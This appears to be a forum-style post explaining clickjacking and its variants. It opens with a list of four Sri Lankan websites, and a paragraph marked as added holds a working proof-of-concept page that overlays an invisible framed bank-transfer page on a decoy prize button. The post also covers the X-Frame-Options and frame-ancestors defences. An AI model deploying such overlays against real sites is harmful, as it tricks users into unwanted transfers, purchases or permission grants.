- Nozero.lk
- Sipwinonline.lk
- Daraz.lk
- Myschool.lk
⛑️What a Typical Clickjacking Attack Looks Like💻
⚠️By far the most common approach to clickjacking involves presenting the user with a mix of two overlaid web pages in the browser window and some kind of incentive to click in specified places. The attacker starts by loading the vulnerable target website into an iframe, sets it to full transparency, and places the frame in front of a malicious web page created to elicit clicks in suitable places.
🏴☠️For example, imagine a fun browser-based game displayed in a popup window, perhaps offering prizes or attractive content for winners. The game could be shown as the background page, and the targeted web application, such as a banking or e-commerce site, overlaid on top of it in a completely transparent frame. The attacker crafts the game page so that clickable items are in the same position as selected controls on the targeted site. When attempting to click in-game items, the user is actually clicking invisible controls on the vulnerable web page with potentially serious consequences.
🧬Depending on the site used, the victim might be unwittingly sending 5-star reviews, liking dubious Facebook pages, giving permissions to Facebook applications, logging in using SSO schemes, or using 1-click shopping to ship expensive items to the attacker. If combined with drag-and-drop techniques, the attack might also trick the user into completing text fields in a web form or filling CAPTCHAs. In this case, carefully prepared interactions with the game cause the user to unknowingly drag text on the invisible page and drop it on a form field.
☢️Types of Clickjacking Attacks🖥️
🔰Clickjacking is not one specific attack but a broad family of attack vectors and techniques, collectively termed UI redress attacks. Attacks can be divided into two general categories, depending on whether they use overlaid content. Overlay-based attacks are by far the most popular, and embedding pages in invisible iframes is the most common technical approach. Within the overlay-based category, there are several main variants:
- Complete transparent overlay: This is the method used in our example above, where a transparent legitimate page (here called a tool page) is overlaid on a carefully crafted malicious page. The tool page is loaded into an iframe that is made invisible with `opacity: 0` (not `visibility: hidden` or `display: none`, which would also stop the frame from receiving clicks) and positioned above the visible page by giving it a higher z-index value. One of the first high-profile clickjacking attacks used this method against the Adobe Flash plug-in settings page to trick users into giving Flash animations access to the computer's camera and microphone.
- Cropping: For this attack, the attacker overlays only selected controls from the transparent page on the visible page. Depending on the aim of the attack, this could mean covering buttons with invisible hyperlinks to trigger a different action than expected, covering text labels with misleading instructions, replacing button labels with false commands, or covering up the entire legitimate page with misleading content, leaving only one original button exposed.
- Hidden overlay: This was the first demonstrated approach to clickjacking. The attacker creates a 1x1 pixel iframe containing malicious content and positions it under the mouse cursor, so it’s hidden by the cursor but any click will register on the malicious page.
- Click event dropping: The legitimate page is displayed in the foreground, completely obscuring the malicious page behind it. The attacker sets the CSS `pointer-events` property of the top (legitimate) layer to `none`, causing click events to "drop" through the overlaid legitimate page and register only on the malicious page below.
- Rapid content replacement: Opaque overlays are used to cover up the targeted controls, only removed for a fraction of a second to register the click, and immediately replaced. This requires the attacker to predict the exact moment of the victim’s click, but with a little knowledge of computer user habits and psychology, it’s easier than it sounds.
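To make the mechanics of the complete transparent overlay concrete, here is an added example page; it is not from the original post and not code from any of the sites listed above. A visible decoy "game" button is placed at fixed coordinates, and the target site is framed on top of it at zero opacity so that the user's click lands on the framed control instead. The target URL `https://bank.example/transfer`, the pixel coordinates and the decoy text are constructed for illustration, and the CSS comment shows the stacking change that turns it into the click event dropping variant described above.

```html
<!DOCTYPE html>
<!-- Added example, not from the original post. The target URL, the
     control position (300px/200px) and the decoy content are assumptions. -->
<html lang="en">
<head>
<meta charset="utf-8">
<title>Win a prize!</title>
<style>
  body { margin: 0; font-family: sans-serif; }

  /* The visible decoy: a "game" button at fixed coordinates. */
  #decoy {
    position: absolute;
    top: 300px;      /* must line up with the target control's position */
    left: 200px;
    width: 160px;
    height: 40px;
    z-index: 1;
  }

  /* The target site, framed on top of the decoy and made invisible.
     opacity: 0 keeps the frame clickable; visibility: hidden or
     display: none would NOT deliver clicks to it. */
  #target {
    position: absolute;
    top: 0;          /* use negative offsets here to shift the framed page */
    left: 0;         /* until its button sits exactly under the decoy */
    width: 1024px;
    height: 768px;
    border: 0;
    opacity: 0;      /* 0.3 while aligning during testing, 0 for the attack */
    z-index: 2;      /* higher than the decoy, so the frame receives the click */
  }

  /* Click event dropping variant: show the legitimate page on top and let
     clicks fall through to the malicious page underneath instead:
     #target { opacity: 1; pointer-events: none; }
  */
</style>
</head>
<body>
  <h1>Click the button 5 times to claim your prize!</h1>
  <button id="decoy">Click me!</button>

  <!-- Assumed target page with a one-click action (e.g. a "Confirm transfer"
       button) that, inside the framed page, sits at the decoy's coordinates. -->
  <iframe id="target" src="https://bank.example/transfer"></iframe>
</body>
</html>
```

The attack only works if the browser is willing to render the target inside the attacker's frame. If the target responds with `X-Frame-Options: DENY` or a Content-Security-Policy `frame-ancestors` directive that excludes the attacker's origin, the frame stays blank and no click reaches it, so checking those response headers is the first step when assessing whether a site is exposed.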
Even without exploiting clickjacking vulnerabilities to insert overlays, attackers have many options for tricking users into clicking unexpected controls:
- Scrolling: The attacker partially scrolls a legitimate dialog box or other web page element off the screen, so the user only sees some of the controls. For example, a warning dialog might be scrolled off the screen so that only the OK and Cancel buttons are visible, with the attacker positioning an innocuous prompt text so it looks like the buttons apply to this message, and not a warning.
- Repositioning: This attack requires the attacker to rapidly move a trusted dialog (or another UI element) under the cursor while the user is focused on clicking some other, innocent-looking items. If this works, the user will instinctively click the substituted control before they realize that something has changed. As with rapid content replacement, the attacker may quickly move the dialog back after the click to avoid detection.
- Drag-and-drop: While most clickjacking attacks explicitly focus on intercepting clicks, drag-and-drop vulnerabilities can be exploited to trick the user into performing a variety of other actions, such as completing web forms by dragging invisible text into invisible text boxes or revealing sensitive personal information to the attacker.
- ...and many others: The dynamic interactions between the user and web page elements made possible by combining JavaScript, DOM, and CSS offer innumerable options for tricking users into performing unexpected actions. Because clickjacking attacks exploit the user’s trust in the displayed content and controls, they can be hard to detect automatically, and new attacks will continue to appear.
- I think the security level must be increased on those websites.